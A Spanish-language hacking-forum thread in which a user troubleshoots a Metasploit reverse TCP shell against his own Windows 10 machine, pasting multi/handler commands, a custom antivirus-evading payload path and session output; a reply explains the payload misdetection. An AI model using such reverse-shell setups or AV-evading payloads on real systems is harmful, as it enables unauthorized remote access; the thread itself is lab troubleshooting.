El libre pensamiento para un internet libre
No estas registrado.
Buenas
Soy haciendo purebas con metasploit y un payload que he hecho a mano para que no me detectan los antivirus.Y me sale bien porqué no esta detectado por ningun antivirus.Eso no esta complicado a hacer cuando sabes que los antivirus detectan solamente lo que conocen...
Entonces tengo un problemo, no puedo conseguir une consola meterpreter aunqué la sesión esta abierta en el terminal.Soy usando kali-linux 2021.3 con metasploit v6.1.8-dev.
Mi objectivo es mi ordenador con windows 10, al dia y con avast antivirus.
Suelo usar esos comandos con metasploit para abrir la sesión:
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set EXE::Custom /tmp/koalapayload.exe
EXE::Custom => /tmp/koalapayload.exe
msf6 exploit(multi/handler) > set LHOST 192.168.1.**
LHOST => 192.168.1.**
msf6 exploit(multi/handler) > set LPORT 8111
LPORT => 8111
msf6 exploit(multi/handler) > exploit
Casi en séguida puedo ver que la sesión etsa abierta:
[*] Started reverse TCP handler on 192.168.1.**:8111
[*] Command shell session 1 opened (192.168.1.**:8111 -> 192.168.1.**:60201) at 2021-10-24 19:57:33 +0200
El problemo es que no puedo conséguir una sesión meterpreter , se abre la sesión pero se queda bloqueada.
Puedo conséguir a ver el répertorio dondé he iniciado el payload en el ordenador de la victima con el comando "dir" pero sin poder hacer nada mas."cd", "rm", "execute" y todas los otros comandos no andan.Parece que solamente puedo ver lo que hay en el ordenador de la victima sin poder hacer algo mas...
He intentado de hacer un
sessions 1
Y se queda bloqueado
sessions 1
[*] Session 1 is already interactive.
O sea he pasado la sesión en "background" para ver si podia recuperar la despuès pero no me viene tambien.
background
Background session 1? [y/N] y
msf6 exploit(multi/handler) > sessions -i
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell sparc/bsd 192.168.1.**:8111 -> 192.168.1.**:60201 (192.168.1.**)
msf6 exploit(multi/handler) > sessions 1
[*] Starting interaction with 1...
Despuès de eso nada se esta moviendo en la consola... Para probar que el problemo no viene del antivirus, le apagado pero el problemo sigue igual.He abierto una tema en el github de metasploit para ver si tendré una solucion pero no sé si no me lo van a suprimir, mi inglès esta muy limitado...
A ver si alguien me puede hechar una mano si tengo la solucion en el git de metasploit ya la pondré aqui.
Desconectado
En el ultimo copiado-pegado podemos leer que la consola es de tipo sparc/bsd y diría que tiene que ser de tipo "win" o "windows" o algo así.
En este hilo del repositorio Github comentan que no hay que fiarse de la opción generic/shell_reverse_tcp: Windows shell detected as shell sparc/bsd
Va a seleccionar automáticamente el tipo de payload y suele equivocarse.
Deberías probar con un tipo de payload más especifico,
Desconectado
Buenas
He hecho pruebas con payload mas espesifico.Ahora my sesion es abierta y esta detectado como "windows" pero sigue igual, puedo ver y hacer andar calc.exe o cmd.exe en el ordenador de la victima pero sin ver la salida en meterpreter que se queda bloqueado y sin poder modificar ficheros en el ordenador de la victima.
sessions -i
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell x86/windows 192.168.1.**:8111 -> 192.168.1.**:57309 (192.168.1.**)
He probado con un payload en arquitectura x64, me detecta bien la sesion en x64
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell x64/windows
En el ordenador de la victima podemos ver que mi payload esta andando en el task manager de windows10
Y el cmd.exe que he iniciado en kali sale en el ordenador de la victima tambien
Pero sigue igual no consigo tener una consola meterpreter..
Desconectado
Tema | Respuestas | Vistas | Ultimo mensaje |
---|---|---|---|
Error de inicio en entorno gráfico por Hunter310#
|
24 | 14984 | 20-06-2022 12:22:19 por kcdtv |
15 | 2711 | 10-06-2022 09:13:42 por kcdtv | |
0 | 209 | 02-06-2022 10:05:09 por kcdtv | |
TP-Link Backup Decryption Utility por kcdtv
|
0 | 200 | 31-05-2022 18:44:34 por kcdtv |
¡Aircrack-ng 1.7 ya está disponible! por kcdtv
|
1 | 513 | 13-05-2022 08:46:52 por Koala |
Ultimo usuario registrado: Asakuras
Usuarios registrados conectados: 0
Invitados conectados: 15
Número total de usuarios registrados: 2,317
Número total de temas: 1,587
Número total de mensajes: 15,137
Atom tema feed - Impulsado por FluxBB